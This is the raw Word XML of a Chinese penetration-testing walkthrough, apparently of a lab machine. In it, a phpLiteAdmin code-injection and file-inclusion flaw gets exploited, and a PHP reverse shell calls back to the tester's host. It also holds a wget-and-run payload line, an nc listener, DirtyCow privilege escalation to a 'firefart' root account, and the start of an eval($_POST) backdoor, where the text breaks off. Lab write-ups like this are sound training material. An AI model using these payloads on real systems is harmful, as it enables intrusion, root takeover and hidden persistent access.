    <w:p w14:paraId="32C4AC5E" w14:textId="293BDA59" w:rsidR="002924DF" w:rsidRDefault="002924DF" w:rsidP="002924DF">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002924DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1234B468" wp14:editId="0AF9B906">
            <wp:extent cx="5267325" cy="15430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4086" w14:textId="77777777" w:rsidR="002924DF" w:rsidRDefault="002924DF" w:rsidP="002924DF">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39CF90C5" w14:textId="4ED90096" w:rsidR="00396EC1" w:rsidRDefault="002924DF" w:rsidP="00396EC1">
      <w:r w:rsidRPr="002924DF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F85E85" wp14:editId="544F00F6">
            <wp:extent cx="5267325" cy="15430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9B53" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>7.尝试利用代码注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E09D1D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="30F832FC" w14:textId="472D2571" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="001D55E7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>查询</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据库版本信息（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E5723" w14:textId="7D65F48D" w:rsidR="001D55E7" w:rsidRDefault="001D55E7" w:rsidP="001D55E7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D55E7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B63CB0B" wp14:editId="4E714EB8">
            <wp:extent cx="5267325" cy="1543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208" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="7A62B77E" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    存在代码注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38264DC4" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="30822EBF" w14:textId="51D35E65" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="001D55E7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>创建一个新的数据库（/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/databases/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hack.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8807FB" w14:textId="0EB38882" w:rsidR="001D55E7" w:rsidRDefault="001D55E7" w:rsidP="001D55E7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D55E7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1888AE3C" wp14:editId="45AD6FA6">
            <wp:extent cx="2842439" cy="3709283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3593" cy="37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275D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="241AC353" w14:textId="18DA05A8" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>c.创建一个test表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C404E5" w14:textId="1E424D1E" w:rsidR="00396EC1" w:rsidRDefault="001D55E7" w:rsidP="00396EC1">
      <w:r w:rsidRPr="001D55E7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70952BE5" wp14:editId="25C1F2A5">
            <wp:extent cx="5219738" cy="2105040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9271" w14:textId="493DAC25" w:rsidR="00396EC1" w:rsidRDefault="001D55E7" w:rsidP="001D55E7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00396EC1">
        <w:t>设置缺省值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3325C3" w14:textId="7E7C164E" w:rsidR="001D55E7" w:rsidRDefault="001D55E7" w:rsidP="001D55E7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001D55E7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26829F86" wp14:editId="5478A457">
            <wp:extent cx="5274310" cy="13709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B01C" w14:textId="65F00FB6" w:rsidR="0099196C" w:rsidRDefault="0099196C" w:rsidP="001D55E7">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099196C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4597B041" wp14:editId="5DFCCCFE">
            <wp:extent cx="5274310" cy="16376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DD4E" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="4D58D486" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>e.利用文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DDF4B1" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="5501063D" w14:textId="5F159A69" w:rsidR="00396EC1" w:rsidRDefault="0099196C" w:rsidP="00396EC1">
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00244A40">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.10.151/view.php?page=../../../../usr/databases/hack.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3101EE91" w14:textId="33D8DBE4" w:rsidR="0099196C" w:rsidRPr="0099196C" w:rsidRDefault="0099196C" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099196C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="217884FC" wp14:editId="707F6268">
            <wp:extent cx="5028114" cy="2111071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0463" cy="21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722" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="2E3EF614" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>8.获得反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407335FB" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1EEABA6C" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>a.测试机编写一个shell.txt，并开启apache服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE8BB7" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1942B417" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    &lt;?php $sock=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fsockopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"192.168.10.128",6666);exec("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh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&lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F038A35" w14:textId="7CC2E570" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="0099196C">
      <w:pPr>
        <w:ind w:firstLine="42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>/apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD4CD8A" w14:textId="71F2A1A2" w:rsidR="0099196C" w:rsidRDefault="0099196C" w:rsidP="0099196C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099196C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="042FC183" wp14:editId="3DE4B5C9">
            <wp:extent cx="5274310" cy="17519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E168" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="02A91792" w14:textId="16E781E5" w:rsidR="00396EC1" w:rsidRDefault="0099196C" w:rsidP="0099196C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00396EC1">
        <w:t>将上步测试用的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00396EC1">
        <w:t>dbadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00396EC1">
        <w:t>中的test表删除，新建一个test1表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B90B02" w14:textId="4A6EDAC6" w:rsidR="0099196C" w:rsidRDefault="0099196C" w:rsidP="0099196C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0099196C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="631D0E8A" wp14:editId="79E75538">
            <wp:extent cx="5274310" cy="15328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BAB2" w14:textId="77777777" w:rsidR="0099196C" w:rsidRDefault="0099196C" w:rsidP="0099196C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF9E5C7" w14:textId="661FEBF3" w:rsidR="00396EC1" w:rsidRDefault="0099196C" w:rsidP="00396EC1">
      <w:r w:rsidRPr="0099196C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C0A5C9" wp14:editId="03A4D8DB">
            <wp:extent cx="5033999" cy="239079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16D" w14:textId="192FE4CA" w:rsidR="0099196C" w:rsidRDefault="0099196C" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099196C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D68DD91" wp14:editId="7CEBAD97">
            <wp:extent cx="5274310" cy="1532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BD71" w14:textId="206AD436" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="0099196C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>上传shell.txt文件至靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E12C3F" w14:textId="474970FC" w:rsidR="0099196C" w:rsidRDefault="0099196C" w:rsidP="0099196C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099196C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="678051E1" wp14:editId="72C8CBA9">
            <wp:extent cx="5274310" cy="15424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60BC" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="65ABC71D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">&lt;?php </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.10.128/shell.txt -O /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; php /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>");?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0293EE" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1FF1D69F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>d.测试机开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC35E57" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3106FB82" w14:textId="1C39FC0C" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vnlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77871054" w14:textId="3D8C2C4B" w:rsidR="0099196C" w:rsidRDefault="0099196C" w:rsidP="00396EC1">
      <w:r w:rsidRPr="0099196C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="458C0C6B" wp14:editId="7332DDD1">
            <wp:extent cx="5274310" cy="818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8423" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="2D3931B8" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>e.利用文件包含漏洞，访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06353531" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="42464801" w14:textId="75905D69" w:rsidR="00396EC1" w:rsidRDefault="0099196C" w:rsidP="00396EC1">
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00FF0B3B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.10.151/view.php?page=../../../../usr/databases/hack.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E39F7B8" w14:textId="76A806F3" w:rsidR="0099196C" w:rsidRPr="0099196C" w:rsidRDefault="0099196C" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099196C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="271F9110" wp14:editId="0C260A0E">
            <wp:extent cx="5274310" cy="1361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38D7" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="03A247DB" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>f.拿到shell，转换成交互式</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03AB556F" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="5EF931A1" w14:textId="0B4F4538" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F351B" w14:textId="647F7335" w:rsidR="00D4455C" w:rsidRDefault="00D4455C" w:rsidP="00396EC1">
      <w:r w:rsidRPr="00D4455C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08739EAF" wp14:editId="569B5EAA">
            <wp:extent cx="5181638" cy="30670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30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D112" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="0FEE6261" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>9.Dirtycow提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740D79D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1D9C7A9A" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>a.将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirtycow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>提权文件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>传至靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17183440" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="1699279C" w14:textId="555FC5BF" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="00D4455C" w:rsidRPr="00FF0B3B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.10.128/dirty.c</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E6E7821" w14:textId="53753361" w:rsidR="00D4455C" w:rsidRDefault="00D4455C" w:rsidP="00396EC1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4455C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5240FF22" wp14:editId="22888E99">
            <wp:extent cx="5153063" cy="2819421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5388" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3E3E434D" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b.gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>编译</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirty.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，执行exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8B1F8" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="63C05E7E" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pthread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirty.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o exp -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65F5FB16" w14:textId="4700ACA4" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00D4455C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>exp 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588DDBCA" w14:textId="0790CC41" w:rsidR="00D4455C" w:rsidRDefault="00D4455C" w:rsidP="00D4455C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4455C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F88BAA" wp14:editId="17981EC5">
            <wp:extent cx="5152666" cy="3955774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5330" cy="395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69BD" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="461B3CF8" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>c.查看passwd文件，查看此时用户情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFED09C" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="5395B455" w14:textId="7D99CCA9" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>head -1 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D7A17" w14:textId="0A1F09D2" w:rsidR="00D4455C" w:rsidRDefault="00D4455C" w:rsidP="00396EC1">
      <w:r w:rsidRPr="00D4455C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63C87F73" wp14:editId="29FC1F0A">
            <wp:extent cx="5274310" cy="10185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BAA" w14:textId="77777777" w:rsidR="00D4455C" w:rsidRDefault="00D4455C" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3133FB8B" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="3245D518" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>d.验证使用被改变的root用户登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CCC24" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="5200536C" w14:textId="483F841F" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47BC69A9" w14:textId="47E191EA" w:rsidR="00D4455C" w:rsidRDefault="00D4455C" w:rsidP="00396EC1">
      <w:r w:rsidRPr="00D4455C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33A7A962" wp14:editId="1C61BC8E">
            <wp:extent cx="4132238" cy="1546528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2038" cy="155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F9" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="540F1151" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>e.编写后门文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611845FD" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1"/>
    <w:p w14:paraId="7B41D485" w14:textId="77777777" w:rsidR="00396EC1" w:rsidRDefault="00396EC1" w:rsidP="00396EC1">
      <w:r>
        <w:t>&lt;?php @eval($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>POST[</w:t>
